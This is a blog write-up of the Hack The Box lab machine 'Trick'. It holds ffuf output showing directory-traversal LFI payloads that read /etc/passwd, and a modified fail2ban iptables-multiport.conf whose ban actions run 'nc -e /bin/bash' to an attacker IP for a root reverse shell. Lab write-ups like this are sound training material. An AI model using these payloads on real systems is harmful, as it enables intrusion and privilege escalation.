HTB - Trick » IslandDog Cayman Islands

🗣️Introduction

For the next few HTB entries the post will simply be my notes from Obsidian converted to WordPress. This is due to recent time constraints with my personal life not providing enough time to write out full guides. I do see the usefulness in the post though as the tags and information allow me to quickly reference how I handled certain aspects in the past.

🔎🦶Enumeration/Foothold

Copy

`dig` – Guessing the Trick.htb domain and finding a sub-domain

Copy

`ffuf` finding an additional sub-domain when I noticed preprod- :

Copy

`ffuf` – Finding an LFI Inject point in the page= parameter

Copy

/'___\  /'___\           /'___\
       /\ \__/ /\ \__/  __  __  /\ \__/
       \ \ ,__\\ \ ,__\/\ \/\ \ \ \ ,__\
        \ \ \_/ \ \ \_/\ \ \_\ \ \ \ \_/
         \ \_\   \ \_\  \ \____/  \ \_\
          \/_/    \/_/   \/___/    \/_/

v1.5.0 Kali Exclusive <3
________________________________________________

:: Method           : GET
 :: URL              : http://preprod-marketing.trick.htb/index.php?page=FUZZ
 :: Wordlist         : FUZZ: /opt/seclists/Fuzzing/LFI/LFI-Jhaddix.txt
 :: Follow redirects : false
 :: Calibration      : false
 :: Timeout          : 10
 :: Threads          : 40
 :: Matcher          : Response status: 200,204,301,302,307,401,403,405,500
 :: Filter           : Response words: 1
________________________________________________

....//....//....//....//....//....//....//....//....//....//....//....//....//....//....//....//....//....//....//....//....//....//etc/passwd [Status: 200, Size: 2351, Words: 28, Lines: 42, Duration: 63ms]
....//....//....//....//....//....//....//....//....//....//....//....//....//....//....//....//....//....//....//....//....//etc/passwd [Status: 200, Size: 2351, Words: 28, Lines: 42, Duration: 64ms]
....//....//....//....//....//....//....//....//....//....//....//....//etc/passwd [Status: 200, Size: 2351, Words: 28, Lines: 42, Duration: 75ms]
[snip]

Verified `LFI` with browser and used Michael user found to get `SSH` key passwd | id_rsa:

/etc/password file found via LFI.

🔝Escalation to Root

Logging in as Michael:

Copy

Database Credentials found under Payroll sub-domain (not needed – possible secondary exploit method?):

Copy

Lines 274-279 – Found Username/Password for other sub-domain (not needed – possible secondary exploit method?):

Copy

`Sudo -l` shows fail2ban running and I can restart it:

Copy

Reading Grumpgeekwrite – Fail2Ban shows exploit available via `fail2ban`:

iptables-multiport.conf

# Fail2Ban configuration file
#
# Author: Cyril Jaquier
# Modified by Yaroslav Halchenko for multiport banning
#

[INCLUDES]

before = iptables-common.conf

[Definition]

# Option:  actionstart
# Notes.:  command executed once at the start of Fail2Ban.
# Values:  CMD
#
actionstart = <iptables> -N f2b-<name>
              <iptables> -A f2b-<name> -j <returntype>
              <iptables> -I <chain> -p <protocol> -m multiport --dports <port> -j f2b-<name>

# Option:  actionstop
# Notes.:  command executed once at the end of Fail2Ban
# Values:  CMD
#
actionstop = <iptables> -D <chain> -p <protocol> -m multiport --dports <port> -j f2b-<name>
             <actionflush>
             <iptables> -X f2b-<name>

# Option:  actioncheck
# Notes.:  command executed once before each actionban command
# Values:  CMD
#
actioncheck = /usr/bin/nc -e /bin/bash 10.10.16.5 4242

# Option:  actionban
# Notes.:  command executed when banning an IP. Take care that the
#          command is executed with Fail2Ban user rights.
# Tags:    See jail.conf(5) man page
# Values:  CMD
#
actionban = /usr/bin/nc -e /bin/bash 10.10.15.10 4242

# Option:  actionunban
# Notes.:  command executed when unbanning an IP. Take care that the
#          command is executed with Fail2Ban user rights.
# Tags:    See jail.conf(5) man page
# Values:  CMD
#
actionunban = <iptables> -D f2b-<name> -s <ip> -j <blocktype>

[Init]

Copy

Rooted

Copy

Rooted

Published On: July 12th, 2023 / Categories: HTB, Technology / Tags: dig, DNS, Fail2Ban, ffuf, LFI, Linux /

HTB – Trick

Trick from HTB features a hidden sub-domain vulnerable to LFI which gets us the SSH key to user. For root we enumerate the database and use fail2ban.

🗣️Introduction

🔎🦶Enumeration/Foothold

`dig` – Guessing the Trick.htb domain and finding a sub-domain

`ffuf` finding an additional sub-domain when I noticed preprod- :

`ffuf` – Finding an LFI Inject point in the page= parameter

Verified `LFI` with browser and used Michael user found to get `SSH` key passwd | id_rsa:

🔝Escalation to Root

Logging in as Michael:

Database Credentials found under Payroll sub-domain (not needed – possible secondary exploit method?):

Lines 274-279 – Found Username/Password for other sub-domain (not needed – possible secondary exploit method?):

`Sudo -l` shows fail2ban running and I can restart it:

Reading Grumpgeekwrite – Fail2Ban shows exploit available via `fail2ban`:

iptables-multiport.conf

Rooted

Rooted

Leave A Comment Cancel reply

HTB – Trick

Trick from HTB features a hidden sub-domain vulnerable to LFI which gets us the SSH key to user. For root we enumerate the database and use fail2ban.

🗣️Introduction

🔎🦶Enumeration/Foothold

dig – Guessing the Trick.htb domain and finding a sub-domain

ffuf finding an additional sub-domain when I noticed preprod- :

ffuf – Finding an LFI Inject point in the page= parameter

Verified LFI with browser and used Michael user found to get SSH key passwd | id_rsa:

🔝Escalation to Root

Logging in as Michael:

Database Credentials found under Payroll sub-domain (not needed – possible secondary exploit method?):

Lines 274-279 – Found Username/Password for other sub-domain (not needed – possible secondary exploit method?):

Sudo -l shows fail2ban running and I can restart it:

Reading Grumpgeekwrite – Fail2Ban shows exploit available via fail2ban:

iptables-multiport.conf

Rooted

Rooted

Related Posts

HTB – Busqueda

HTB – MonitorsTwo

HTB – Pilgrimage

HTB – Keeper

Leave A Comment Cancel reply

`dig` – Guessing the Trick.htb domain and finding a sub-domain

`ffuf` finding an additional sub-domain when I noticed preprod- :

`ffuf` – Finding an LFI Inject point in the page= parameter

Verified `LFI` with browser and used Michael user found to get `SSH` key passwd | id_rsa:

`Sudo -l` shows fail2ban running and I can restart it:

Reading Grumpgeekwrite – Fail2Ban shows exploit available via `fail2ban`: